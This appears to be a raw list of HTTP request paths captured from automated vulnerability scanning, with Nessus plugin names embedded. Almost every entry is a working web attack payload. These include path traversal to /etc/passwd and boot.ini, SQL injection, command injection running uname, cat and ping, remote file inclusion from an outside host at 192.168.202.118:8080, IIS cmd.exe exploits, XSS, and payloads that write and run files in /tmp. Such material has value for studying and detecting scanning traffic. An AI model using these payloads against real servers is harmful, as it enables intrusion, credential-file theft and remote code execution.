/nmw0do67.cgi? /javascript/secret.exe /bzuf9ozq.dll? /t3af3tdz.pl? /examples/jsp/num/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /cgi-bin/cgitest.exe /aboutsubscription/ /forum-ra_professionnel.asp?n=/etc/passwd\x00 /bn857frh.asp? /scripts/500page.jsp /qb2xy9aw.pl? /phpmyadmin/../phpmyadmin.sql /help.php?q="|ping\x09-w\x098000\x09-n\x091\x091.2.3.4|rem\x09 /instructionsearch_description/ /scripts/shop.plx/page=nessus1300331803 /administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/tzhfyzkbomspvm? /examples/jsp/colors/base_local_rules.php?dir= /examples/jsp/cal/includes/converter.inc.php?include_path=/etc/passwd\x00 /javascript/copyright.exe /bin/texis.exe/junk /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904216',null,null,null,null -- /cacti/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00 /include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/zz5thkvtmlgl? /uvazfs7p.html? /y8pmygrp.html? /matrixssl/ /iisscanscript/ /xsqln7eb.do? /main.php?logout=&ver\x0c>q16537712&rem\x0c /cgi/vssetcookie.exe /javascript/weather.exe /cacti/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd /ap58k3ci.exe? /en-us/hipkz026.cfc? /b16_sos children's support worker/ /iissamples/issamples/fastq.idq?citemplate=../../../../../../../../../../winnt/win.ini /en-us/ /scripts/weblog /main.php?logout="ping\x09-w\x098000\x09-n\x091\x091.2.3.4&rem\x09 /ydexw8by.cfc? /1qwv2p5p.pl? /d44uk9h2.kspx? / /admin/operators.php?projectissueid="><" /include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/ghl9il? /login.asp?ret_page=a"><" /main.php?stuff="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /examples/jsp/sessions/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd /scripts/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og /j4drbkil.asp? /main.php?stuff="&ver\xa0>q39243847&rem\xa0 /copatranscript_20061031/ /examples/servlets/servlet/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /javascript/frame.exe /cgi-bin/add_url.htm?node= /examples/jsp/colors/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /top.php?stuff="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /en-us/ /examples/jsp/jsp2/el/faq.php?action=&type=view&s=&id=-1' union select 0,963542110,0,0,0,0,0-- /cgi-local/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /6dlc2zm9.pl? /javascript/admin-console.exe /cgi-bin/base_local_rules.php?dir= /cms/revert-content.php?type=newest&id=1" union all select null,null,11221133,null,null/* /admin/index.php?path_to_script=http://192.168.202.96:8080/no4ghqiguzhst??&cmd=ls /ht8pn8uq.exe? /edzaia0i.jsp? /ybz5rz7a.cfc? /examples/jsp/checkbox/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /javascript/.passwd.bat /recordings/include/error/autherror.cfm?errorcode=1&ftvar_linkp="> /confirmunsubscription.php?output=http://192.168.202.96:8080/no4ghqiguzhst? /stdrun13.exe/ /ju0u7kfo.x? /examples/jsp/sessions/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /main.php?logout='\x0duname\x09>q39919215\x09# /let's ride/ /scripts/commerce.cgi?page=../../../../../etc/passwd\x00index.html /cacti/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /sys/code/box.inc.php?config[\"sipssys\"]=@rfiurl /cacti/search.php?submit=true&search='); /examples/jsp/jsp2/jspx/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd /examples/jsp/cal/index.php?templates_dir=/etc/passwd\x00 /recordings/search.cgi?..\..\..\..\..\..\winnt\win.ini /0u75ldxq.nsf? /7uz3ok60.idc? /help.php?q="rm q82754698 # /examples/jsp/sessions/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /9o6g5vkn.jsp? /javascript/.htaccess.sfish/'`false`' /top.php?stuff='\x0adel q53951968 # /help.php?q=\x0auname\x09>q34532953\x09# /d5a5renl.exe? /javascript/docs.exe /scripts/1hactwocbsuo.pl /search.jsp?q=%" /top.php?stuff="&ver\xa0>q83547895&rem\xa0 /main.php?logout=;uname # /main.php?stuff="&sleep\x0910\x09# /cacti/remindpasswd /u8yiqilu.exe? /i686v90l.cfm? /cgi.cgi/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1077905216,0,0,0,0,0-- /yef5f3d5.do? /phpmyadmin/ftp/ftp.pl?dir=../../../../../../etc /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=id /examples/jsp/checkbox/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /examples/jsp/jsp2/jspx/shopexd.asp?catalogid='42 /top.php?stuff="ping -w 10000 -n 1 1.2.3.4&rem /main.php?stuff=&rm;q41243131&rem; /phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://cirt.net/rfiinc.txt? /index.php?id='union/**/select/**/0,0,617137594,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /mod_membre/inscription.php?chemin=http://192.168.202.118:8080/ghl9il?? /8x6w469u.htm? /phpmyadmin//../../../../../../../../etc/passwd /scripts/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /top.php?stuff=';uname\x09>q48683432\x09# /scripts/rvckwz6smkqf.php3 /cgi-bin/styles.php?toroot=/etc/passwd\x00 /0w155a7c.cgi? /phpmyadmin/documentation.html?phpmyadmin=\x0acat /etc/passwd /cgi/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /zln2hm2z.jsp? /awstats/awstats.pl?migrate=|echo;/./tmp/ptsrmtfadl.sh;echo|awstats625810.txt /b5xdqgz2.php3? /search/submit.php?config["sipssys"]=http://192.168.202.96:8080/4dckqcc0acprbz? /quagynka.jspa? /ida_scripts/ /recordings/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /t3af3tdz.cfc? /egaet53a.jsp? /m2fpztty.fts? /ao22ww7y.do? /7dbjwpw6.cgi? /fcgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /scripts/lom_update.php?etcdir=@rfiurl /examples/jsp/colorssearch_results.dot?search_query=nessus">/ /help.php?q=';sleep 7 # /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.old /main.php?stuff='\x0auname >q85424597 # /ap58k3ci.html? /zroo33l4.do? /main.php?stuff='\x0arm\x09q47233887\x09# /top.php?stuff="del q51291193&rem /cgi-perl/pfdispaly.cgi?../../../../../../../../../../etc/passwd /d44uk9h2.php3? /examples/servlets/servlet/snpfiltered.pl?t=c&u= /examples/jsp/colors/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /scripts/index.php?edit=nonexistant1438827371 /fc9t54l7.html? /j4rdyhw8.htm? /wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /top.php?stuff="|ping,-w,10000,-n,1,1.2.3.4|rem, /help.php?q="\x0asleep 7 # /en-us/account/login.php?user="> /search.php?search_phrase=\"><;"&search=search /javascript/failure.exe /cacti/index.cfm?fuseaction=category.display&category_id=' /bmeun223.cgi? /o1zj4u9v.htm? /cacti/top.php?header=../../../../../../../../etc/passwd /help.php?q=del;q25171792&rem; /news/scripts/news_page.php?script_path=http://192.168.202.118:8080/tzhfyzkbomspvm?? /buyhydrocodonenoprescription/ /firewall/policy/policy?fzone=internal&tzone=dmz1 /phpmyadmin/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /javascript/flv.exe /scripts/zpanel.php?page=/etc/passwd\x00 /scripts/tools/getdrvrs.exe /top.php?stuff="rm q95826835 # /scripts/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /recordings/search.cgi?..\..\..\..\..\..\windows\win.ini /scripts/lrn28issfuqi.shtml /jackrabbit/search.jsp?q=%" /8x6w469u.cfm? /amarok-scripts/ /help.php?q="&del\x0cq33739327&rem\x0c /webcgi/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /scripts/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd /scripts/search.jsp?q=%" /scripts/mail.php?id='/**/union/**/select/**/1,2,1331908741,4--&blog=1 /scripts/cdjnwtwnqga1.asp /women's_health/ /newkprosubscription/ /ybz5rz7a.aspx? /xlj7h65o.php3? /jujgxwav.jsp? /_vti_bin/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\+/og /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /top.php?stuff="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /m5103snj.exe? /m5103snj.php3? /javascript/restricted.exe /examples/servlets/servlet/search.cgi?..\..\..\..\..\..\winnt\win.ini /esmozg5d.cgi? /scripts/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /help.php?q="&rm\x0bq16289629&rem\x0b /javascript/open.exe /cgi-bin/db2www/library/document.d2w/show /cgi-perl/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /scs86g1p.exe? /d7ktpmcq.cfm? /recordings/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd /zv8tv7h8.idc? /8t9v8k7x.fts? /javascript/pbo.exe /scripts/showproduct.php?product=1' /help.php?q=";rm\x09q65733963\x09# /main.php?stuff="|ping,-w,8000,-n,1,4.3.2.1|rem, /j734qobz.dll? /en-us/account/add_url.htm?node= /phpmyadmin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /cialis-prescriptions/ /maillistsubscription/ /esmozg5d.pl? /main.php?stuff="|ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /descriptions_published/ /javascript/mods.exe /javascript/lost.exe /d44uk9h2.pl? /.do /jdx255ea.jsp? /en-us/n9xlumt5.jsp? /scripts/nmap.php?target=|ipconfig /all /0qhcnefz.exe? /ht8pn8uq.php3? /phpmyadmin//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16 /help.php?q="\x0ddel\x09q93881688\x09# /main.php?stuff="ping;-w;8000;-n;1;4.3.2.1|rem; /action.php/"> /iktok2bw.jspa? /uvazfs7p.htm? /um7xpn15.do? /examples/jsp/num/top.php?header=../../../../../../../../etc/passwd /interface/login/login_frame.php?site=" and "1"="1 /longdescriptionfeed/ /a0imiuf1.x? /top.php?stuff="ping\x09-w\x097000\x09-n\x091\x094.3.2.1|rem\x09 /help.php?q=ver\x09>q56341131&rem\x09 /cgi-bin/index.php?op=default&date=200607' union select 1,1576609633,1,1,1,1,1,1,1,1--&blogid=1 /index.php?query=&type=advanced&results=20&searchtype=2 /main.php?stuff="|ping;-w;11000;-n;1;1.2.3.4|rem; /javascript/bloggers.exe /main.php?stuff="ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /main.php?frm_daynight=q35298715&frm_passwd=&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width= /en-us/33y9gcqq.cfm? /examples/jsp/colors/index.php?id='union/**/select/**/0,0,2034425430,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /cgi-bin/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00 /..\xc0\xaf/admin/config.php /examples/jsp/error/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /0rufe52p.kspx? /javascript/alert.exe /sysuser/docmgr/update.stm?name= /examples/jsp/colors/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /javascript/nfs.exe /search?ns-query-pat=../../../../../../../../../../etc/passwd /main.php?stuff="ping -w 7000 -n 1 1.2.3.4|rem /nmw0do67.x? /e9rx3ya4.cgi? /scripts/gbpass.pl /javascript/robot.exe /dda2qr7j.mscgi? /_mem_bin/..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og /main.php?logout="&del\x0bq42433487&rem\x0b /formmail_script/ /en-us/oie504mr.nsf? /6n7aacgg.jsp? /ddoworrl.cfm? /cacti/index.php?p='nessus /examples/jsp/jsp2/jspx/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /scripts/2pwudii1mt22.pl /dslpwt15.jspa? /phpmyadmin/documentation.html?phpmyadmin=../../../../../../../etc/passwd /scripts/prnnucptkixl.asp /ao22ww7y.cfm? /d765w06j.pl? /jnv890lt.cgi? /jujgxwav.aspx? /en-us/account/smpwservicescgi.exe /weq93ppb.cfm? /manager/webadmin.php?show=/etc/passwd /clk;33749358;7163019;q/ /cgi-bin/index.php?id=' /main.php?logout=ver\xa0>q87867783&rem\xa0 /javascript/jre.exe /examples/jsp/colors/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /apavxugx.cfm? /en-us/account/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl /scripts/4rzefq7dsowk.php /javascript/test.exe /main.php?logout='\x0ddel\x09q37443231\x09# /cgi-bin/forums.asp?ifor=duforum_sql_injections.nasl' /cgi-bin/index.php?id='union/**/select/**/0,0,768662659,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /6n7aacgg.php? /examples/jsp/cal/shopper.cgi?newpage=../../../../../../etc/passwd /examples/jsp/jsp2/jspx/story.pl?next=../../../../../etc/passwd\x00 /eei78ore.x? //q99252119&q8892"q8892<q8892>q99252119 /en-us/33y9gcqq.idc? /e9rx3ya4.do? /htbin/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /main.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4|rem\xa0 /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/ghl9il? /cgi-bin/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /main.php?stuff="ver >q82735586&rem /fnwhrxyd.asp? /ollyscript-project/ /9kr0ih0v.php? /javascript/51.exe /examples/jsp/colors/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /purchaseprintsubscription/ /javascript/change.exe /d7ktpmcq.aspx? /cgi-bin/backup/add-passwd.cgi /main.php?stuff=";uname >q62299957 # /en-us/w4996nr0.x? /csconm/servlet/login/login.jsp?url=csconm/servlet/com.cisco.core.mice.main?command= /webtools/bonsai/cvsblame.cgi?file= /g8nu2yy7.nsf? /script/tick/test.php?path_to_code=http://192.168.202.118:8080/moclyxlwqyfjnp? /javascript/func.exe /igtf0zon.cfc? /jdx255ea.exe? /606wkcop.mscgi? /help.php?q="&del\x09q44432678\x09# /v3axg1p8.asp? /javascript/general.exe /recordings/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /scripts/index.php?file=news&op=phpinfo /r3le3om5.do? /0z575z74.x? /31873-hezbolla's global reach/ /examples/jsp/num/dsweb/services/user-1"> /en-us/account/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /dslpwt15.x? /">generaldocument.cookie="testydan=5106;" /fo564rei.aspx? /jnv890lt.x? /javascript/_vti_txt.exe /examples/servlets/servlet/index.php?post=../config/password /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=b49qub_3fcej28fx9 /d5a5renl.nsf? /scripts/index.php?action=login&module=users /fcgi-bin/vssetcookie.exe /cgi-bin/index.php?id=9_8hm4y9d6' /store.cgi?startid=../../../../../../../../../etc/passwd\x00.html /admin/top.php?admindir=/etc/passwd\x00 /examples/jsp/num/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd /scripts/irbf6nj7oyfh.shtml /bn857frh.php3? /quagynka.fts? /javascript/sold.exe /cgi-bin/search.jsp?q=%" /top.php?stuff=&ping;-w;7000;-n;1;1.2.3.4&rem; /manager/index.php?act=arcade&do=stats&gameid=1' /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../vtigerservice.php\x00 /forum1_professionnel.asp?n=1771&nn=....//....//....//....//....//....//....//etc.passwd&page=1 /main.php?stuff='del\x09q85612241\x09# /1qwv2p5p.mscgi? /nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00 /javascript/_js.exe /cacti/index.php?id=_pb9wansu9' /passwd.adjunct /ghswfouu.asp? /main.php?logout="\x0asleep 9 # /javascript/11.exe /1qwv2p5p.cfm? /manager/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /scripts/udblphlq4nln.php3 /recordings/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /dda2qr7j.dll? /raanw4ia.cfc? /examples/jsp/cal/index.php?module= /scripture/ /aj3pf49c.asp? /v3axg1p8.cfc? /scripts/eezuu7xc7ge3.asp /scripts/qcvjnagy16kc.shtml /help.php?q=';sleep 9 # /9kr0ih0v.php? /cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat /etc/passwd| /33y9gcqq.mscgi? /p043snfr.html? /nuh3zirz.jspa? /en-us/h5sc3gxy.jsp? /recordings/language.php?data_dir=/etc/passwd\x00 /zqqemp6j.jspa? /cgis/fileseek2.cgi?foot=&head=;cat /etc/passwd| /jscript7/ /javascript/tn.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+0c+20+ae+75+e9+e2+f7+8b+73+18+8d+45+0d+50+6a+0e+e8+18+00+00+00+50+8d+45+1b++>>ctdn /examples/jsp/error/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /recordings/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /top.php?stuff=&ver\xa0>q89228348&rem\xa0 /main.php?stuff="del\x0bq27764952&rem\x0b /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/txenjrxf3? /examples/jsp/error/usrdetails.php?sgnuptype=csaleid /l752x1ry.php3? /cgi-914/testcgi.exe /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'-- /scripts/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/messaging.exe /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/ghl9il?\x00 /m2fpztty.fts? /o35zot2r.jspa? /azcrfs8d.jspa? /cgi-bin/tst.bat|dir ..\\..\\..\\..\\..\\..\\..\\..\\, /top.php?stuff="del\x09q89765477\x09# /h4bi26jd.htm? /i686v90l.mscgi? /msdnsubscriptions/ /help.php?q="rm\x0bq54818771&rem\x0b /examples/jsp/colors/myevent.php?myevent_path=/etc/passwd\x00 /main.php?stuff="ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09 /esp?page=<script>alert(document.cookie)</script> /scripts/nph-exploitscanget.cgi?host=`id`&port=3128&errchk=0&idsbypass=0 /examples/jsp/checkbox/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /nmw0do67.aspx? / /top.php?stuff="ping\x09-w\x0911000\x09-n\x091\x091.2.3.4&rem\x09 /examples/servlets/servlet/index.php?gadget=glossary&action=view&term= /scripts/tsweb.asp /8x6w469u.exe? /en-us/7o5qp766.fts? /awstatstotals/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+n+ctdnu.com+>ctdn /bzuf9ozq.cgi? /jscript3/ /quagynka.cgi? /h5i6crm3.x? /shops/sub.asp?isub=duamazon_sql_injections.nasl' /jw64yq8u.jsp? /javascript/document.dat /cgis/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /en-us/7o5qp766.php3? /examples/jsp/sessions/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00 /h5sc3gxy.asp? /help.php?q='&rm q89912813 # /main.php?logout="&del q75783223&rem /0u75ldxq.fts? /8t9v8k7x.kspx? /en-us/account/cvslog.cgi?file= /cacti/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /scripts/view.php?pg=foobar /3m5knyc4.cfc? /jdx255ea.cfm? /scripts/faq.php?action=&type=view&s=&id=-1' union select 0,595479233,0,0,0,0,0-- /index.php?catid=<script>alert('vulnerable')</script> /d765w06j.htm? //a="%3cscript%20src=%27http://www.example.com/test?rnd=q54789313%27%3e%3c%2fscript%3e";document.writeln(unescape(a)) /examples/jsp/checkbox/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html /lookup_result.asp?domain=&tld=.com&user=&selecte=&word1=&word2=&word3=&choix=&option1=&option2= /cgi-win/fileseek2.cgi?foot=;cat /etc/passwd&head= /main.php?g2_itemid=../../../../../license\x00 /edzaia0i.html? /subscriptions_np1/ /bn857frh.cfm? /examples/jsp/sessions/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 ftp://127.0.0.1/* /azcrfs8d.php3? /iv5vkgam.fts? /5qnlm5z2.mscgi? /help.php?q='|sleep\x098\x09# /t3af3tdz.php3? /gvx7m5ti.html? /main.php?logout=';uname\x09>q16263765\x09# ftp://192.168.28.103/* /v3axg1p8.cfc? /javascript/htpasswd.err /javascript/unsubscribe.exe /examples/jsp/cal/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /t3af3tdz.jsp? /help.php?q="&ver\xa0>q49941678&rem\xa0 /en-us/account/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /using logon scripts figure 61102332855146/ /ybz5rz7a.dll? /tuwjta1w.fts? /en-us/dda2qr7j.x? /xoops_lib/modules/protector/oninstall.php?mydirname=a(){}echo(md5('xoops_2_3_2brce'));function+v /phptonuke.php?filnavn=/etc/passwd /help.php?q="&ping\x0b-w\x0b10000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b // /t3af3tdz.cfm? /help.php?q="del q82754698 # /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/zz5thkvtmlgl? /main.php?stuff="&uname\x09>q91551817\x09# /1qwv2p5p.php3? /examples/jsp/error/topic.php?tid='select /examples/jsp/checkbox/showproduct.php?product=1' /qb2xy9aw.dll? /cgi-perl/fileseek2.cgi?foot=;cat /etc/passwd&head= /examples/jsp/error/user.cgi?url=">&from=add /help.php?q='\x0auname >q19373947 # /forum.asp?n=c:\boot.ini|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'c:'. /workarea/contentratinggraph.aspx?type=time&view=day&res_type=content&res=1' and cms400_res_sql_injection.nasl --&enddate=5/10/2008 12:00:00 am /msmsgsin.exe/ /cgi-bin/shopaddtocart.asp?productid='42 /mpcgi/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /scripts/index.php?board=nonexistant1755399079 /main.php?frm_daynight=day&frm_passwd=q42292951&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=&scr_width= /main.php?stuff=|ping;-w;7000;-n;1;1.2.3.4|rem; /0u75ldxq.cgi? /main.php?logout="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /examples/servlets/servlet/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /scripts/1332009300-ror_session_fixation.nasl /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../../../../../../../../../../..//boot.ini\x00 /user.php?caselist[bad_file.txt][path]=http://192.168.202.96:8080/4dckqcc0acprbz?&command=cat /etc/passwd /index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null-- / /cgi-bin/bb-hist.sh?histfile=../../../../../etc/passwd /m4kkjf8l.cfm? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/btnvlgnsgo;" /examples/jsp/jsp2/jspx/index.php?show=../../../../../../../../../../../etc/passwd\x00 /examples/jsp/cal/admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /"user centric identity"/ /modules.php?name=news&op=rate_complete&sid=1' and 1=0 union/**/ select 'sqlinjection_test&score=5 /metakeywordsanddescriptions/ /edzaia0i.cfm? /javascript/priv.exe /scripts/www/delivery/ac.php?bannerid=-636+or+1=1 /manager?username=" /examples/servlets/servlet/phf?qalias=x\x0a/bin/cat /etc/passwd /examples/jsp/jsp2/jspx/fxm.exe /top.php?stuff=;del q28242581 # /cgi-915/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /qczkquis.nsf? /jnt3f86c.do? /exampleswebapp/interactivequery.jsp?person= /index.php?req=submit=submit /hrttz9fj.pl? /iisadmpwd/..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\+/og /main.php?logout=uname\x09>q88531476\x09# /manager/shopper.cgi?newpage=../../../../../../etc/passwd /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/ghl9il?\x00 /o6ebbirj.htm? /cgi/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /u8yiqilu.idc? /cgi.cgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /phpmyadmin/dsweb/services/user-1"> /scriptin-1/ /top.php?stuff="|ping;-w;11000;-n;1;4.3.2.1|rem; /acart2_0/admin/index.asp?msg= /help.php?q=ping;-w;8000;-n;1;4.3.2.1&rem; /odzk29aa.php? /cacti/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html /scripts/t99iadgtkf9h.shtml /zv8tv7h8.exe? /cgi-bin/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /examples/jsp/error/index.php?album=../../../../../../../../../../etc/passwd\x00 /javascript/story.exe /top.php?stuff="&ping -w 11000 -n 1 1.2.3.4&rem /yver8r9o.do? /phpmyadmin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /scgi-bin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+e0+00+8e+81+0b+01+02+19+00+02+00+00+00+04+00+00+00+00+00+00+00+10+00+00++>>esbq /examples/jsp/sessions/welcome.php?custom_welcome_page=/etc/passwd\x00 /scgi-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /jujgxwav.pl? /examples/jsp/jsp2/jspx/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /javascript/catinfo.exe /modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini /cgi-bin/viewcvs.cgi/viewcvs/?cvsroot= /main.php?stuff=ver;>q76531174&rem; /phpmyadmin/auktion.cgi?menue=../../../../../../../../../etc/passwd /cgi-bin/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd /copatranscript_20061023/ /pxagj7n7.x? /82q7ywa8.jsp? /examples/jsp/colors/cal_week.php?op=week&catview=999' /admin/operators.php?projectissueid="><" /phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd\x00 /en-us/.x /help.php?q=";rm q69686889 # /javascript/poc.exe /examples/jsp/cal/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null-- /6dlc2zm9.cgi? /scripts/callboth.php?seq=654321&out=123456&in=1331904232@nessus\x0d\x0aasteridex_in_code_injection.nasl /nuh3zirz.html? /7o5qp766.html? /yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/tzhfyzkbomspvm?? /examples/jsp/sessions/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00 /examples/jsp/jsp2/el/sendcard.php?view=1&id='sendcard_sql.nasl /main.php?stuff=ping;-w;9000;-n;1;4.3.2.1|rem; /javascript/cards.exe /scriptpath/index.php?page=http://192.168.202.118:8080/tzhfyzkbomspvm? /examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00 /cacti/index.php?module= /javascript/cocoon.exe /main.php?logout=";sleep\x097\x09# /i7prbs22.cfc? /jackrabbit/search.jsp?q=%" /ap58k3ci.aspx? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/rymojltfjq0;'); function v /b4vng02k.cfm? /scripts/cvsweb.cgi/ /cgi-local/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /phpmyadmin/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /ht8pn8uq.dll? /r3le3om5.do? 